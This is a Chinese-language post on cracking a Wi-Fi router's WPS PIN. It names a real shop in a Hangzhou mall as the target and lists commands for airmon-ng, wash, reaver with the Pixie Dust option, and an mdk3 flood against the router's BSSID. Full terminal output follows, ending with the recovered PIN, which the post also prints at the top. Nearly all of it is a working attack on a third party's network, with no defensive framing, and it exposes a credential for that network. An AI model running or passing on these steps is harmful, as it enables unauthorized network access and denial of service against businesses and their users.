WIFI路由器WPS的pin码破解实战

目标:杭州万达1F雅戈尔门店

WPS pin: 46537089


 

工具:KALI系统、LAFALINK LF-D520B网卡、aircrack-ng、reaver、pixiewps

airmon-ng start wlan0

wash -i wlan0mon

reaver -i wlan0mon -b 14:B9:68:47:02:8C -vv -S -K 1 -N -d 5

mdk3 wlan0 a -a 14:B9:68:47:02:8C


root@kali:~# wash -i wlan0mon
BSSID Ch dBm WPS Lck Vendor ESSID
——————————————————————————–
50:64:2B:04:53:73 1 -45 2.0 No RalinkTe \\xe7\\x88\\xb1\\xe5\\x9b\\x9e\\xe6\\x94\\xb6
14:B9:68:47:02:8C 6 -47 2.0 No RalinkTe YOUNGOR-WANDA
^C
root@kali:~# reaver -i wlan0mon -b 14:B9:68:47:02:8C -vv -S -K 1 -N -d 5

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 14:B9:68:47:02:8C
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Received beacon from 14:B9:68:47:02:8C
[+] Vendor: RalinkTe
[+] Trying pin “12345670”
[+] Sending authentication request
[!] Found packet with bad FCS, skipping…
[+] Sending association request
[+] Associated with 14:B9:68:47:02:8C (ESSID: YOUNGOR-WANDA)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
executing pixiewps -e 185abe7047f6fda8e9cbc92177f2fdb17182839df315ee1012d1a652458cc6aab2a693cefc9c36bd17ce0a1e91e8b5f0a5886428d89dd5a1ee25a05d9088f49190c8f7eb8f5b2f28338586cf9e744c6fc46bed722287277029dc2a98c1e01ed254c6c6514e64e95ac8c199a9d654a29a946a083483bb1de98fcb16eed27684144539372f353c6b33d97afea56efa4cded3a57c7e4605c00696659ed2173417b76f68cfb4f10d5b588b6f8c688b5738fc46565bd253c3b7e8a14025a04f03d33a -s dcbb9c8ae8ad2cf7c93263dc2ca9a22b356de369f317cae75e0a15d07c6c3bd5 -z 17e49281e97c39032cca85dc5c78f87084bea1b874fd0cdb0bb602ed89efdf9c -a 0c900a51d358f9a1b52989a805ae3e15f04adc316ddd2213e364426c95b357e0 -n 733e8db6ed8ac1096a1e7c3be497832e -S

Pixiewps 1.4

[?] Mode: 1 (RT/MT/CL)
[*] Seed N1: 0xb75e890a
[*] Seed ES1: 0x00000000
[*] Seed ES2: 0x00000000
[*] PSK1: 8e81b23410943714d6786a5b41b911f2
[*] PSK2: 1ce556acbb71519fb849bba6599f4f6a
[*] ES1: 00000000000000000000000000000000
[*] ES2: 00000000000000000000000000000000
[+] WPS pin: 46537089

[*] Time taken: 0 s 19 ms